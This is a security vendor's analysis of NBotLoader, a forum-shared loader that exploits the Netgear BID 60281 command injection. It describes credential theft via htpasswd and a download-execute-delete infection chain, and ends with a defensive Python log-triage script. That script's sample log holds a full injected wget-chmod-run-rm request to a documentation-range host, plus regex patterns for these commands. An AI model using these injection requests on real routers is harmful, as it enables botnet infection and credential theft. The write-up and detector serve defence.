NBotLoader: Netgear Bug Weaponized as a Dangerous Exploit
Introduction
In the field of malware development, one important factor is the extent of collaboration and sharing between malware authors. This sharing of resources is what lets malware be offered as “MaaS”, or Malware as a Service. As malware code is shared and becomes more readily available among threat actors, the probability increases that its usage becomes more widespread.
Malware for the Internet of Things follows the same trend. It is often observed that when malicious code is readily available, it causes more havoc, since it generally leads to more re-use by “script kiddies” (copy-and-paste, low-skilled hackers) and thus new variants appear. BASHLITE was one example: several variants were forked once its source code was leaked.
We recently observed that a known bug in some Netgear routers (better known as Bug ID 60281) has been weaponized in hacking forums to act as an IoT botnet loader, referred to as NBotLoader.
Advantages of Using an IoT Bug
An IoT bug is a useful resource for attackers since they do not have to depend on brute forcing default credentials. Even if the target implements a strong password policy, it can still be compromised if the IoT device is unpatched. Also, compared to Windows systems, which are often updated automatically, IoT devices are in general not updated as regularly. Thus an unpatched device can remain vulnerable for longer periods of time and is a prime target for attackers.
The Concept of BID 60281
BID 60281 is a well-known bug which can result in unauthorized arbitrary code execution on unpatched NetGear DGN1000 and DGN2200 routers. While accessing cgi.sys, if the URL contains “currentsetting.htm” and executable code is injected in between, it will run even without authentication. The result is that an attacker with rudimentary skills can craft a URL to execute arbitrary code despite not having the necessary privileges.
BID 60281 in Action
If one tries to access a NetGear router vulnerable to Bug 60281, an authentication window will challenge the visitor, as shown below:
Without the correct credentials, access will be refused and the attacker will see the following:
However, if one uses a crafted URL that queries cgi.sys with currentsetting.htm, injected code can be executed. In the case below, we do exactly this against our unpatched NetGear test box. The injected command performs a syscmd to access the htpasswd file. This file contains the username and credentials in plaintext, and is obviously not intended to be accessed by anyone without the proper privileges:
We can observe that the injected command runs and, without any authentication, we can view the plaintext credentials. We did a lookup with Shodan and found that, despite this being a known bug, several vulnerable devices are exposed to the internet.
The weaponized code uses the same vulnerability as BID 60281, but it is more elaborate than the proof of concept, which only exposes credentials. The entire attack cycle of NBotLoader is described in the flowchart below:
The script takes two parameters: one is the IP address of the target Netgear router, and the other is the command and control server where the malicious payload is hosted, as shown in the figure below.
NBotLoader has a validation routine which checks whether the victim IP is a valid external address and hence suitable for exploitation. For this it carries a fixed list of internal IP prefixes (namely 127.0, 10.0 and 192.168). If the IP matches any of these, the script will not proceed with the exploitation attempt.
Once the IP is validated, the script triggers the vulnerability to check whether the NetGear router is exploitable. This part is much like the proof of concept for Bug 60281 (i.e. code injection) to access the htpasswd file, which contains the router's credentials in plaintext.
The script logic assumes that if exploitation is successful, the username and password will be returned in plaintext. It further checks for the string “admin” in the response (assuming this must be one of the usernames). If it is found, the validation is complete and the script attempts to exploit the vulnerability by executing the infection module, as shown in the figure below:
The infection module will:
- Perform a wget via syscmd to download the payload from the C2 under the expected name ntpd. (Coincidentally, this same disguised payload name has been actively used by ELF binaries belonging to the BASHLITE and Mirai IoT botnet families.)
- Grant execute rights to the downloaded binary with chmod 777 and run the file.
- After execution, delete traces using rm -rf.
Introducing a BID 60281 Scanner
NBotLoader is not the only piece of code related to Bug ID 60281 that is circulating in hacking forums. In a different hacking forum, we observed another script being freely shared which is used simply to scan for and locate vulnerable Netgear devices (those unpatched against Bug ID 60281). In this case, the unauthorized code executed is simply “echo lolimgay”.
If the exploitation is successful, the command will be executed and the response will contain the echoed string. The script checks for exactly this, as shown in the figure below:
While hunting for binaries which might have used this code, we indeed found ELF executables that use the same code (as can be seen in the disassembly). The ELF had zero static detections on VirusTotal at the time of its submission.
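As an added example (not code from the article or from NewSky Security), here is a Python triage routine that runs the indicators described above for NBotLoader and the forum scanner over constructed web-server log lines: it flags requests that carry the currentsetting.htm/syscmd injection pattern and labels which stage of the attack cycle each one corresponds to. The log format, the stage names and the simplified query layout are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Markers taken from the write-up: the BID 60281 injection pattern plus the
# commands NBotLoader and the forum scanner inject. Stage names are our own.
STAGES = [
    ("scanner-probe", re.compile(r"echo\s+lolimgay")),
    ("credential-disclosure", re.compile(r"htpasswd")),
    ("payload-download", re.compile(r"wget\b.*\bntpd\b")),
    ("payload-execute", re.compile(r"chmod\s+777")),
    ("trace-deletion", re.compile(r"rm\s+-rf")),
]

# Common Log Format, as written by a reverse proxy in front of the router.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def classify_request(url):
    """Return the attack-cycle stages seen in one request URL, or None when
    the request does not carry the BID 60281 injection pattern at all."""
    decoded = unquote(url).lower()  # attackers URL-encode spaces and slashes
    if "currentsetting.htm" not in decoded or "syscmd" not in decoded:
        return None  # e.g. a legitimate, authenticated page load
    stages = [name for name, pat in STAGES if pat.search(decoded)]
    return stages or ["unknown-command"]

def triage(log_lines):
    """Map each source IP to the set of exploitation stages it attempted."""
    by_ip = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than abort the triage
        stages = classify_request(m.group("url"))
        if stages:
            by_ip.setdefault(m.group("ip"), set()).update(stages)
    return by_ip

# Constructed sample log (RFC 5737 documentation addresses, simplified query
# layout); not a capture from the original article.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jun/2017:12:00:01 +0000] "GET /cgi.sys?currentsetting.htm&syscmd=echo%20lolimgay HTTP/1.1" 200 64',
    '203.0.113.9 - - [10/Jun/2017:12:05:10 +0000] "GET /cgi.sys?currentsetting.htm&syscmd=cat%20/etc/htpasswd HTTP/1.1" 200 128',
    '203.0.113.9 - - [10/Jun/2017:12:05:12 +0000] "GET /cgi.sys?currentsetting.htm&syscmd=wget%20http://203.0.113.50/ntpd;chmod%20777%20ntpd;./ntpd;rm%20-rf%20ntpd HTTP/1.1" 200 0',
    '192.0.2.4 - - [10/Jun/2017:12:07:00 +0000] "GET /currentsetting.htm HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for ip, stages in triage(SAMPLE_LOG).items():
        print(ip, sorted(stages))
```

A source that shows credential-disclosure followed by payload-download is reproducing the NBotLoader validate-then-infect sequence, while scanner-probe alone matches the forum scanner.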
Conclusion & Remediation
In the Windows threat landscape, known vulnerabilities have often been weaponized. We now see a parallel process in the IoT exploit threat landscape, where a known vulnerability is adapted into an exploit through collaboration in hacker forums, resulting in a full-blown loader for potentially several ELF binary botnets. This loader is equally effective even if the password is strong.
Since this was uploaded for free on a membership-only hacker forum, more people could abuse it.
NewSky Security's IoT Halo detects Bug ID 60281 at both the proactive and reactive levels. If NBotLoader or a similar script tries to compromise a router protected by IoT Halo, the traffic will be stalled and the exploitation rendered ineffective. On the reactive level, that is, in cases where IoT Halo is deployed post-exploitation, detection and blocking will still take place based on the behavior of the payload botnet.
For more on NewSky Security's IoT Halo, please refer to https://www.newskysecurity.com/IoTcontainer.html